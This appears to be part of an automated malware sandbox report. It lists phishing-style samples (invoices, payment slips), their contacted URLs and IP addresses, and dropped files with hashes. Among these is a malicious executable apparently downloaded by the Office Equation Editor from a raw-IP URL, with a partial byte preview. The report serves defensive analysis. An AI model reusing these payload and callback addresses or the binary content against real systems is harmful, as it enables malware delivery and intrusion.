                                                    Payment Slip.exeGet hashmaliciousBrowse
                                                    • www.mansmoon.com/ieqo/?d0Dp1LT=ETh6YPBaRd9pkAtMkXT35iNOOLTNfM2UpDCj11Cj0uSdzSMBMvZJsSGo0tFhBbgUmfAphnrAqw==&5j=X2M4
                                                    Payment Advice.exeGet hashmaliciousBrowse
                                                    • www.abbyrosemusic.com/ieqo/?kF=IHiHnl1x&6l9t=tqFEINBjsXkIDtrDMgs7q68weiWEu1OhsDLUZdQmPDRycZwRKP8v6xWOdTS3ITDUBarR
                                                    RFQ-02020.exeGet hashmaliciousBrowse
                                                    • www.windypinesfarm.com/uo4x/?WHRHMx=SrQD&i6Ad6V=PA4OirjFZ1/r0RNyc2w/qGMlQjHVjI+prvlXJObEgrXCUq91Vki2ja2H+FSqO2ODPHhW
                                                    QT 20210508.xlsxGet hashmaliciousBrowse
                                                    • www.micheldrake.com/p2io/?y0DT=8puD_pzxCVk&inbXu=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==
                                                    SHIPPING DOCUMENTS.exeGet hashmaliciousBrowse
                                                    • www.shiveringcactus.net/cre4/?lP=7+hRd8m1vP97o5DubQyJa7OS+X2NiXrCwgnyTwU2qt1qd4obqhWDAvBuao2LAea1LupR&9roH=-ZWh127
                                                    CTM ARRANGEMENT.exeGet hashmaliciousBrowse
                                                    • www.erlebnistage-tomcat.com/pagi/?n2J0W=62OKy2D8vlUi3BwqN7GRotk3LU14JyvZ9FFW8Qkd5qKeHrT6aesSNIYLSbPQMCnJZQLA&TF=Kpb8
                                                    oustanding 03082921.xlsxGet hashmaliciousBrowse
                                                    • www.micheldrake.com/p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    www.thvsjwjvy.icuPKLBpffwsn.exeGet hashmaliciousBrowse
                                                    • 47.91.170.222

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN01_extracted.exeGet hashmaliciousBrowse
                                                    • 103.147.185.192
                                                    E00VS01_Payment_Copy.vbsGet hashmaliciousBrowse
                                                    • 103.147.185.192
                                                    ORDER CONFIRMATION.xlsxGet hashmaliciousBrowse
                                                    • 103.133.106.199
                                                    Renewed Contract with Annex1.xlsxGet hashmaliciousBrowse
                                                    • 103.133.108.160
                                                    V00GH01_Invoice_Copy.vbsGet hashmaliciousBrowse
                                                    • 103.147.185.192
                                                    Payment_and_invoice.vbsGet hashmaliciousBrowse
                                                    • 103.147.184.73
                                                    PO-PT. Hextar-Sept21.xlsxGet hashmaliciousBrowse
                                                    • 103.133.106.199
                                                    Invoice_and_payment_copy.vbsGet hashmaliciousBrowse
                                                    • 103.147.184.73
                                                    N00FX02Invoicecopy.vbsGet hashmaliciousBrowse
                                                    • 103.147.185.192
                                                    http___103.133.106.199_www_vbc.exeGet hashmaliciousBrowse
                                                    • 103.133.106.199
                                                    FED34190876.vbsGet hashmaliciousBrowse
                                                    • 103.140.250.132
                                                    7OuHFYC7TM.exeGet hashmaliciousBrowse
                                                    • 103.89.89.134
                                                    Apartment.vbsGet hashmaliciousBrowse
                                                    • 103.147.184.73
                                                    TT.exeGet hashmaliciousBrowse
                                                    • 103.147.184.211
                                                    PO211000386.xlsxGet hashmaliciousBrowse
                                                    • 103.133.106.199
                                                    Quotation.jarGet hashmaliciousBrowse
                                                    • 103.133.105.29
                                                    Quotation.jarGet hashmaliciousBrowse
                                                    • 103.133.105.29
                                                    FRT_INV_LCIM0037223_1.xlsxGet hashmaliciousBrowse
                                                    • 103.133.106.199
                                                    HC8j8D3dw7Get hashmaliciousBrowse
                                                    • 103.3.246.123
                                                    Reservation.vbsGet hashmaliciousBrowse
                                                    • 103.147.184.73
                                                    AUTOMATTICUS7Tat85Af0C.exeGet hashmaliciousBrowse
                                                    • 74.114.154.18
                                                    PO7420.exeGet hashmaliciousBrowse
                                                    • 192.0.78.25
                                                    XbvAoRKnFm.exeGet hashmaliciousBrowse
                                                    • 74.114.154.22
                                                    setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                    • 74.114.154.22
                                                    PO.exeGet hashmaliciousBrowse
                                                    • 192.0.78.24
                                                    4J1sKiGm0T.exeGet hashmaliciousBrowse
                                                    • 74.114.154.18
                                                    lB2RFTpyni.exeGet hashmaliciousBrowse
                                                    • 74.114.154.22
                                                    lgT2LzjZ6N.exeGet hashmaliciousBrowse
                                                    • 74.114.154.22
                                                    gmeqUPOV23.exeGet hashmaliciousBrowse
                                                    • 74.114.154.22
                                                    BqgOuMRaJ3.exeGet hashmaliciousBrowse
                                                    • 74.114.154.22
                                                    Pm2ZO9KH1V.exeGet hashmaliciousBrowse
                                                    • 74.114.154.18
                                                    m1Bf7Ir6IB.exeGet hashmaliciousBrowse
                                                    • 74.114.154.18
                                                    iuBCaAM3bo.exeGet hashmaliciousBrowse
                                                    • 74.114.154.18
                                                    g81BQy6Qth.exeGet hashmaliciousBrowse
                                                    • 74.114.154.18
                                                    setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                    • 74.114.154.22
                                                    Terw9bPuiD.exeGet hashmaliciousBrowse
                                                    • 74.114.154.22
                                                    C8mREWTLU6.exeGet hashmaliciousBrowse
                                                    • 74.114.154.18
                                                    noJB1GBDPi.exeGet hashmaliciousBrowse
                                                    • 74.114.154.22
                                                    KKmaeWyiu5.exeGet hashmaliciousBrowse
                                                    • 74.114.154.18
                                                    Uli9VSVMnB.exeGet hashmaliciousBrowse
                                                    • 74.114.154.22

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:downloaded
                                                    Size (bytes):687616
                                                    Entropy (8bit):7.451356907663552
                                                    Encrypted:false
                                                    SSDEEP:12288:D1sWHCM2K4CmI/yzQs2TaIpIYshi/YJGsyT4/vCnacxPWJPHS62LbzxI:Bc3CrMIpIzkwWh0qRP9I
                                                    MD5:9F2C198407F1A7D058C06CC174817DB6
                                                    SHA1:24EF8B3C123FB588BB05AE56DFDC19F14B6F22D5
                                                    SHA-256:BD6ECBC27DE051FAB2F753669D77611D137486537358EE6B3C46ED3950D21CEB
                                                    SHA-512:EABB799B26ED02EEB7AAE604AFC5843F27B3E8610D85509EA02BE8BA9421A068CE64F8DE3D903E617520B80E458964CF259210BF0EF282B7CFEF5BB4B0317544
                                                    Malicious:true
                                                    Reputation:low
                                                    IE Cache URL:http://103.133.106.199/rbi/vbc.exe
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9.Aa..............0......n......"-... ...@....@.. ....................................@..................................,..O....@...k........................................................................... ............... ..H............text...(.... ...................... ..`.rsrc....k...@...l..................@..@.reloc...............|..............@..B.................-......H...........(.......Q...(+...............................................0............}.....(.......(......r...p.(....(....o......{.....(....o......{....r...p.(....(....o......{.....(....o......{.....(....o......{.....(....o.....*...0.._........(.........(.....o............,)....t......o....r-..p(......,..o......+..(....o....(......+...*..0...........(....o....o ...o!....+..*...0..:........(.........(.....o............,.r-..p.+....t....o"....+..*...0..:........(.........(....
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13C76BCD.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                    Category:dropped
                                                    Size (bytes):14198
                                                    Entropy (8bit):7.916688725116637
                                                    Encrypted:false
                                                    SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                    MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                    SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                    SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                    SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15B9D769.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):84203
                                                    Entropy (8bit):7.979766688932294
                                                    Encrypted:false
                                                    SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                    MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                    SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                    SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                    SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A862FF1.emf
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):7788
                                                    Entropy (8bit):5.545865526644212
                                                    Encrypted:false
                                                    SSDEEP:96:wrwsCblJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHX:wrwhTNAK4oOIGbK1RvVwPAWmOHX
                                                    MD5:02FBA89D35A5FCB4CD622FE217C6E7C4
                                                    SHA1:AF462A244279D1DFA20D84C9B11C4AEA9FD9C5F5
                                                    SHA-256:0C93DF5057D092D43EE31DF8DB9C47C9D55F1654956CB23B5215FB82CD202C07
                                                    SHA-512:9FCCDDBA4764A9A5CABD8F15F73E9DEB09B0351E5B3A6641E4F1638EFD2F07D7240101022A1F5B0068E983B02C3BA2FCB09101503557BEC29CE2AE4020561F74
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: ....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.....).d.......................P.....p....\.....................p........<5.u..p....`.p`...$y.w......1............w....$.......d.......4....^.p.....^.p........@p'...1.-.......<.w................<.9u.Z.v....X..\....`..........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F84C656.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                    Category:dropped
                                                    Size (bytes):85020
                                                    Entropy (8bit):7.2472785111025875
                                                    Encrypted:false
                                                    SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                    MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                    SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                    SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                    SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                    Malicious:false
                                                    Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32D73CD4.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):49744
                                                    Entropy (8bit):7.99056926749243
                                                    Encrypted:true
                                                    SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                    MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                    SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                    SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                    SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                    Malicious:false
                                                    Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\446CBE02.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):6815
                                                    Entropy (8bit):7.871668067811304
                                                    Encrypted:false
                                                    SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                                    MD5:E2267BEF7933F02C009EAEFC464EB83D
                                                    SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                                    SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                                    SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                                    Malicious:false
                                                    Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\450E8308.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                                                    Category:dropped
                                                    Size (bytes):7006
                                                    Entropy (8bit):7.000232770071406
                                                    Encrypted:false
                                                    SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                                                    MD5:971312D4A6C9BE9B496160215FE59C19
                                                    SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                                                    SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                                                    SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                                                    Malicious:false
                                                    Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47DE8EC5.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                    Category:dropped
                                                    Size (bytes):14198
                                                    Entropy (8bit):7.916688725116637
                                                    Encrypted:false
                                                    SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                    MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                    SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                    SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                    SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                    Malicious:false
                                                    Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E73753E.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                    Category:dropped
                                                    Size (bytes):85020
                                                    Entropy (8bit):7.2472785111025875
                                                    Encrypted:false
                                                    SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                    MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                    SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                    SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                    SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                    Malicious:false
                                                    Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5B6C721B.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):33795
                                                    Entropy (8bit):7.909466841535462
                                                    Encrypted:false
                                                    SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                                    MD5:613C306C3CC7C3367595D71BEECD5DE4
                                                    SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                                    SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                                    SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                                    Malicious:false
                                                    Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6FA1A827.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                    Category:dropped
                                                    Size (bytes):8815
                                                    Entropy (8bit):7.944898651451431
                                                    Encrypted:false
                                                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                    MD5:F06432656347B7042C803FE58F4043E1
                                                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                    Malicious:false
